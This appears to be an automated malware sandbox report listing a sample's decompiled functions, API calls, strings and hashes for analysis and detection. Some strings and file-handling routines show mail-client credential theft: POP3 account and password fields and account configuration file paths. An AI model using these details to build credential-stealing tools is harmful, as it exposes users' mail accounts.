                                        • Instruction ID: d78f9d5579900fc03bd1cac91791bdff6fc89e9305aab5925cadbbec6cd2e2a4
                                        • Opcode Fuzzy Hash: ca970a007489f54ef6ae2aeea21e8dc01697c2b160d1fbe5bc28a388b57a917d
                                        • Instruction Fuzzy Hash: 30E0B67A004A08EFEF01AF65ED18A493B69EF48385B504478FAC5AB121DB35D943CA69
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: deb07a64a596fa0a94279717a71abccac9f18a1c9f24173b0eb13b021ffda558
                                        • Instruction ID: f26dab599cf828a9f8bd5bbb8303c2f18c097c5527c3ad69541c5aeb28a77f06
                                        • Opcode Fuzzy Hash: deb07a64a596fa0a94279717a71abccac9f18a1c9f24173b0eb13b021ffda558
                                        • Instruction Fuzzy Hash: F0A011B02002038FA308CE30828A20C3AACEA0028830880B8A808E0000FB2088028A08

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 344B1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D1B
                                          • Part of subcall function 344B1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,?,00000080,00000000,?,?,00000000), ref: 344B1D37
                                          • Part of subcall function 344B1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D4B
                                        • _strlen.LIBCMT ref: 344B1855
                                        • _strlen.LIBCMT ref: 344B1869
                                        • _strlen.LIBCMT ref: 344B188B
                                        • _strlen.LIBCMT ref: 344B18AE
                                        • _strlen.LIBCMT ref: 344B18C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strlen$File$CopyCreateDelete
                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                        • API String ID: 3296212668-3023110444
                                        • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                        • Instruction ID: f9f5e514d62640231d246f71791c9e1a73f7a3d3fac69ba5501589487bfeaf6a
                                        • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                        • Instruction Fuzzy Hash: 89611575D00258AFFF118BA4DC80BDEB7B9AF05284F40447ED1C6A7255EB705A46CBB2

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID: %m$~$Gon~$~F@7$~dra
                                        • API String ID: 4218353326-230879103
                                        • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                        • Instruction ID: c807b0a70ab0258bdbb8d341bd0af5c5d05108d45da5cc07a2c8cbcc506676b6
                                        • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                        • Instruction Fuzzy Hash: 847106B5D002289FEF129BB49C94ADF7BFCAF09244F5440AAD5C4D7242E6749785CBB0

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3879383872.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000003.00000002.3879368188.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879403378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879455624.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879598230.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879598230.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorModeVersionlstrlen
                                        • String ID: NSIS Error$UXTHEME
                                        • API String ID: 758611499-110662866
                                        • Opcode ID: 98ae8c372d86054e2ccc96880edf90e48c3094bace8399af63df6374aa7df77d
                                        • Instruction ID: 31efa2035741e65c501781d23eca1476aa9478ce53cbfb8e56932e36a8718c69
                                        • Opcode Fuzzy Hash: 98ae8c372d86054e2ccc96880edf90e48c3094bace8399af63df6374aa7df77d
                                        • Instruction Fuzzy Hash: ED21A3B0500304AFD7107F61AE49B1B3A68AB41719F05843EF986BA2D1CF7C5A49CB6E

                                        Control-flow Graph

                                        (control-flow graph rendering for the function at 344b7cc2 is not reproduced here)
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 344B7D06
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B90D7
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B90E9
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B90FB
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B910D
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B911F
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B9131
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B9143
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B9155
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B9167
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B9179
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B918B
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B919D
                                          • Part of subcall function 344B90BA: _free.LIBCMT ref: 344B91AF
                                        • _free.LIBCMT ref: 344B7CFB
                                          • Part of subcall function 344B571E: HeapFree.KERNEL32(00000000,00000000,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?), ref: 344B5734
                                          • Part of subcall function 344B571E: GetLastError.KERNEL32(?,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?,?), ref: 344B5746
                                        • _free.LIBCMT ref: 344B7D1D
                                        • _free.LIBCMT ref: 344B7D32
                                        • _free.LIBCMT ref: 344B7D3D
                                        • _free.LIBCMT ref: 344B7D5F
                                        • _free.LIBCMT ref: 344B7D72
                                        • _free.LIBCMT ref: 344B7D80
                                        • _free.LIBCMT ref: 344B7D8B
                                        • _free.LIBCMT ref: 344B7DC3
                                        • _free.LIBCMT ref: 344B7DCA
                                        • _free.LIBCMT ref: 344B7DE7
                                        • _free.LIBCMT ref: 344B7DFF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: 22798f8882eb48969c4228631812563cc0819d14bda6ea96e0a9f1b10761f291
                                        • Instruction ID: 01743fa4acafb627ba1f350aeb077382703f142f03d80a6dc1600e542363d4f2
                                        • Opcode Fuzzy Hash: 22798f8882eb48969c4228631812563cc0819d14bda6ea96e0a9f1b10761f291
                                        • Instruction Fuzzy Hash: DB313975600204EFFF61AA38DA40B66B7E9AF04394F50487EE8C8D7351DA31E8909B34

                                        Control-flow Graph

                                        APIs
                                        • _free.LIBCMT ref: 344B59EA
                                          • Part of subcall function 344B571E: HeapFree.KERNEL32(00000000,00000000,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?), ref: 344B5734
                                          • Part of subcall function 344B571E: GetLastError.KERNEL32(?,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?,?), ref: 344B5746
                                        • _free.LIBCMT ref: 344B59F6
                                        • _free.LIBCMT ref: 344B5A01
                                        • _free.LIBCMT ref: 344B5A0C
                                        • _free.LIBCMT ref: 344B5A17
                                        • _free.LIBCMT ref: 344B5A22
                                        • _free.LIBCMT ref: 344B5A2D
                                        • _free.LIBCMT ref: 344B5A38
                                        • _free.LIBCMT ref: 344B5A43
                                        • _free.LIBCMT ref: 344B5A51
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 0b925750740d9879534a2a033d7f872b179b6eb951115be8032727316d5bf8bc
                                        • Instruction ID: d9a08297595f5a83d3986a26671b52ff08a8eb4e32709e01c10f925df892e8f5
                                        • Opcode Fuzzy Hash: 0b925750740d9879534a2a033d7f872b179b6eb951115be8032727316d5bf8bc
                                        • Instruction Fuzzy Hash: 4611B97A610148FFDF51EF54C841CDDBFA5EF08254F4540B9BD884F222DA31DA609BA4

                                        Control-flow Graph

                                        (control-flow graph rendering for the function at 344baa53 is not reproduced here)
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: DecodePointer
                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                        • API String ID: 3527080286-3064271455
                                        • Opcode ID: 25fb4806cb4f646501fc6f2b955e9f3a813ebc304f20996f0f01e0963c74b8df
                                        • Instruction ID: 457b635e7bfdb742913d7ff5e8e5e23cd3713d4393bf3408a6ef47e71eea04da
                                        • Opcode Fuzzy Hash: 25fb4806cb4f646501fc6f2b955e9f3a813ebc304f20996f0f01e0963c74b8df
                                        • Instruction Fuzzy Hash: DA518BB8A04609DBEF01CFA4EA4819CBFB4FB4A211F5441B9D5D1B6314CB798E25CB39

                                        Control-flow Graph

                                        APIs
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D1B
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,?,00000080,00000000,?,?,00000000), ref: 344B1D37
                                        • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D4B
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D58
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D72
                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D7D
                                        • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 344B1D8A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 1454806937-0
                                        • Opcode ID: 2fd375445b81130c0a4f486a775be8893509ddc2f0b0e9adc248c6046efafb2b
                                        • Instruction ID: e9c44db5898f5bbc8380999957cdb4463d5ac1985c70b8f85c81cfe97c168830
                                        • Opcode Fuzzy Hash: 2fd375445b81130c0a4f486a775be8893509ddc2f0b0e9adc248c6046efafb2b
                                        • Instruction Fuzzy Hash: 5C212FB594121CBFFF10DFA49C8CEEB76ACEB08398F0005B5F591E2140D6749E468A74

                                        Control-flow Graph

                                        (control-flow graph rendering for the function at 344b9492 is not reproduced here)
                                        APIs
                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,344B9C07,?,00000000,?,00000000,00000000), ref: 344B94D4
                                        • __fassign.LIBCMT ref: 344B954F
                                        • __fassign.LIBCMT ref: 344B956A
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 344B9590
                                        • WriteFile.KERNEL32(?,?,00000000,344B9C07,00000000,?,?,?,?,?,?,?,?,?,344B9C07,?), ref: 344B95AF
                                        • WriteFile.KERNEL32(?,?,?,344B9C07,00000000,?,?,?,?,?,?,?,?,?,344B9C07,?), ref: 344B95E8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 1c3f6473ed7458bf19015a63952ed312784189a03b2a3073ced10ad9956cb61a
                                        • Instruction ID: 0d60f3e0d79b0c492a88cf5d9086a1b0a0f5d28cad9a9f40f15d5c8b3d802503
                                        • Opcode Fuzzy Hash: 1c3f6473ed7458bf19015a63952ed312784189a03b2a3073ced10ad9956cb61a
                                        • Instruction Fuzzy Hash: 0C5184B5904209AFDF10CFA8C895ADEBBB8EF09310F14456AE5D5E7281E670D942CF64

                                        Control-flow Graph

                                        (control-flow graph rendering for the function at 344b3370 is not reproduced here)
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 344B339B
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 344B33A3
                                        • _ValidateLocalCookies.LIBCMT ref: 344B3431
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 344B345C
                                        • _ValidateLocalCookies.LIBCMT ref: 344B34B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 597c235ba590cad899073c7bbf45b66d02507fe75ff7affc250cee790732bf31
                                        • Instruction ID: 34b19c5def7c933824e9a5c9155501669066fa515153e1d8d5a2543ef102d27b
                                        • Opcode Fuzzy Hash: 597c235ba590cad899073c7bbf45b66d02507fe75ff7affc250cee790732bf31
                                        • Instruction Fuzzy Hash: 38419878A00208EFDF01CF6AC84459EBBB5EF45324F148179D9D59B352EBB19915CBA0
                                        APIs
                                          • Part of subcall function 344B9221: _free.LIBCMT ref: 344B924A
                                        • _free.LIBCMT ref: 344B92AB
                                          • Part of subcall function 344B571E: HeapFree.KERNEL32(00000000,00000000,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?), ref: 344B5734
                                          • Part of subcall function 344B571E: GetLastError.KERNEL32(?,?,344B924F,?,00000000,?,00000000,?,344B9276,?,?,?,?,344B7E5A,?,?), ref: 344B5746
                                        • _free.LIBCMT ref: 344B92B6
                                        • _free.LIBCMT ref: 344B92C1
                                        • _free.LIBCMT ref: 344B9315
                                        • _free.LIBCMT ref: 344B9320
                                        • _free.LIBCMT ref: 344B932B
                                        • _free.LIBCMT ref: 344B9336
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                        • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                        • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                        • Instruction ID: 4293504c3fd231d15a9910103e571fb8acc09a05c0753dd0dfaaaa0cce00d457
                                        • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                        • Instruction Fuzzy Hash: F2113D71A40B08EEEE68ABB0DC45FCBFB9D9F08704F408C3DAAD966053DA75E5144A61
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                        • wsprintfW.USER32 ref: 004067C5
                                        • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3879383872.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000003.00000002.3879368188.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879403378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879455624.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879598230.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3879598230.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll$UXTHEME$\
                                        • API String ID: 2200240437-1946221925
                                        • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                        • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                        • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                        • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,344B6FFD,00000000,?,?,?,344B8A72,?,?,00000100), ref: 344B887B
                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,344B8A72,?,?,00000100,5EFC4D8B,?,?), ref: 344B8901
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 344B89FB
                                        • __freea.LIBCMT ref: 344B8A08
                                          • Part of subcall function 344B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 344B5702
                                        • __freea.LIBCMT ref: 344B8A11
                                        • __freea.LIBCMT ref: 344B8A36
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 9134551f37c613f50e912bd7ed756b418cc70175b62c35e1e8a26fd73c9becfb
                                        • Instruction ID: 55c6cb3019f837b43bedecb9f00b963e134c3806987e81fe5f378cad9c579eb1
                                        • Opcode Fuzzy Hash: 9134551f37c613f50e912bd7ed756b418cc70175b62c35e1e8a26fd73c9becfb
                                        • Instruction Fuzzy Hash: 2B51B1B6610616AFEF158E74CC41EAB77A9EF48794F11463DF8C4E6240EB34DC5186B0
                                        APIs
                                        • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 344B1038
                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 344B104B
                                        • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 344B1061
                                        • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 344B1075
                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 344B1090
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 344B10B8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$AttributesFilelstrcat
                                        • String ID:
                                        • API String ID: 3594823470-0
                                        • Opcode ID: 811e4c42ba955658b7f17ed8e442b6ca04558aa2b064bf860dbb16950e2d26e1
                                        • Instruction ID: e1956692aff439bf62bf1de2d9584f21053e498220dfa3082d13b2b22134f49d
                                        • Opcode Fuzzy Hash: 811e4c42ba955658b7f17ed8e442b6ca04558aa2b064bf860dbb16950e2d26e1
                                        • Instruction Fuzzy Hash: 30217176900728DBDF10DA64DC48DDB3768EF44298F1045BAE8DA971A2DE309A86CB60
                                        APIs
                                        • GetLastError.KERNEL32(?,?,344B3518,344B23F1,344B1F17), ref: 344B3864
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 344B3872
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 344B388B
                                        • SetLastError.KERNEL32(00000000,?,344B3518,344B23F1,344B1F17), ref: 344B38DD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 33a8bf6aeebcf720445812c51bb98a324f4478526d7d5914387f1f6b21477eec
                                        • Instruction ID: 78366bde9ce60b16624d7b4a865e15a1d641c0e44d56a56bd5f709897925b945
                                        • Opcode Fuzzy Hash: 33a8bf6aeebcf720445812c51bb98a324f4478526d7d5914387f1f6b21477eec
                                        • Instruction Fuzzy Hash: E501F17760CF11AEBF00957BAC849562B94DF05678720023DE0D0A81D6FEA248029239
                                        APIs
                                        • GetLastError.KERNEL32(?,?,344B6C6C), ref: 344B5AFA
                                        • _free.LIBCMT ref: 344B5B2D
                                        • _free.LIBCMT ref: 344B5B55
                                        • SetLastError.KERNEL32(00000000,?,?,344B6C6C), ref: 344B5B62
                                        • SetLastError.KERNEL32(00000000,?,?,344B6C6C), ref: 344B5B6E
                                        • _abort.LIBCMT ref: 344B5B74
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: ce6f75f47038e8f5a3aaed7d8f398529e4c1429d8bd8a75a1e6fe648de34553f
                                        • Instruction ID: f8f2cbdaf2bcec3d6b27294b1285bcfde63e98f0662f77df1d3c118fdc2950a4
                                        • Opcode Fuzzy Hash: ce6f75f47038e8f5a3aaed7d8f398529e4c1429d8bd8a75a1e6fe648de34553f
                                        • Instruction Fuzzy Hash: 54F0A97A608A00EFFFC262347C44E0AE629DFC556DB140138F9D4A6281FE3488034178
                                        APIs
                                          • Part of subcall function 344B1E89: lstrlenW.KERNEL32(?,?,?,?,?,344B10DF,?,?,?,00000000), ref: 344B1E9A
                                          • Part of subcall function 344B1E89: lstrcatW.KERNEL32(?,?,?,344B10DF,?,?,?,00000000), ref: 344B1EAC
                                          • Part of subcall function 344B1E89: lstrlenW.KERNEL32(?,?,344B10DF,?,?,?,00000000), ref: 344B1EB3
                                          • Part of subcall function 344B1E89: lstrlenW.KERNEL32(?,?,344B10DF,?,?,?,00000000), ref: 344B1EC8
                                          • Part of subcall function 344B1E89: lstrcatW.KERNEL32(?,344B10DF,?,344B10DF,?,?,?,00000000), ref: 344B1ED3
                                        • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 344B122A
                                          • Part of subcall function 344B173A: _strlen.LIBCMT ref: 344B1855
                                          • Part of subcall function 344B173A: _strlen.LIBCMT ref: 344B1869
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3908301420.00000000344B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 344B0000, based on PE: true
                                         • Associated: 00000003.00000002.3908283025.00000000344B0000.00000004.00001000.00020000.00000000.sdmp
                                         • Associated: 00000003.00000002.3908301420.00000000344C6000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_344b0000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                        • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                        • API String ID: 4036392271-1520055953
                                        • Opcode ID: 2bb473521429607bd98b50d2d0c45ed17edfb978ab6b09649e19f2a87a5a1161
                                        • Instruction ID: 8b4c21cfd3e57052bf8a8b7b314e03aabf98ac8ef697d3ed8a94d5db388ff4e7
                                        • Opcode Fuzzy Hash: 2bb473521429607bd98b50d2d0c45ed17edfb978ab6b09649e19f2a87a5a1161
                                        • Instruction Fuzzy Hash: DE21C3B9E10208ABFF1097A4EC81FED7339EF80754F00056AF645EB1D1EAB11D818B68
